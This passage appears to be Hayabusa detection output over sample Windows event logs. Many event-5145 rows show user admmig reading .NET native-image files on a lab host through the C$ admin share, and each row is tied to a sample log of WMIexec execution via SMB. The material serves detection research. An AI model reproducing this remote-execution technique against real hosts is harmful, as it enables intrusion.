20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\MMCFxCommon\52b6052b9447848191f40e69c88f0f8b : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\MSBuild : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\MSBuild\2965d6f0cc081ef81005efec548f72a9 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\mscorlib : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\c90ef9a73ea0044641d31b19023aad61 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\napcrypt : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\napcrypt\2c945f157cd851b9dc43e99e9a89b34d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\naphlpr : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\naphlpr\0ed1ed0e250773e63d7fe047dde76c81 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\napinit : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\napinit\1264f8bd57934a4941865b3c0512803e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\napsnap : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\napsnap\5ab2511c5224a660e85286b3f2c2b752 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c968d57# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c968d57#\cc32e4d4e4dfbff56d3ae35134c1f38e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c9175f8# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c9175f8#\6a2929eeb7b5fa6ff9ef1b0f4ff440f1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1da2af67# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1da2af67#\efd939ad16f7521ac6c0c15afdcb2fa2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio4b37ff64# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio4b37ff64#\8bb4776b03f3c369fd0c81c51cf468ac : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\92388fbe99436e6ed1f56ee56f10c565 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio49d6fefe# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio49d6fefe#\9bb6d55c49486153c1c1872929def220 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio53a7a42c# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio53a7a42c#\373b26e93f287f3cda45a6282a1de0d3 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio080b339b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio080b339b#\9551a2df153a961cbbcb79bca937a833 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a7b877# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a7b877#\db7fe97a2a840dcc0278f7af89ea7fbe : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a6349c# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a6349c#\be1a119716bb1de8469b568ec9e31d9c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatioaec034ca# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatioaec034ca#\e1c86f334a29d92ca264950085cd817e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatiob3047ded# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatiob3047ded#\8bda9cd4f7d015f685bae38300b2c281 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatiod51afaa5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatiod51afaa5#\276763baa173e2b94a6318e28594e7ee : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\619034abb9a9fb1b3dc32c0a9aa38d3c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\PresentationUI : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\PresentationUI\e4b5f01da74352b18e1dffd68b611367 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\ReachFramework : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\ReachFramework\8a1ed041bc25980a548a96cf4b78f4b6 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\SecurityAudf6921413# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\SecurityAudf6921413#\6f2318339b6bd916c3c62b95c91b305d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\SMDiagnostics : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\SMDiagnostics\352d34797f7cd44cd0973c33539200f1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\SMSvcHost : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\SMSvcHost\a4c49e23c0c23b5db4c663738eac897e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\SrpUxSnapIn : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\SrpUxSnapIn\d82382933ba69165a4398eba2fb6c0b2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.426 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System\c24d08cc4e93fc4f6f15a637b00a2721 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.426 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti31fd6628# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.426 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti31fd6628#\1a6ec0d19dfcc35f62014ff3602e6a54 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti2661942e# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti2661942e#\86d8003fea61ae88dd34584f08a9393c : IP Address: 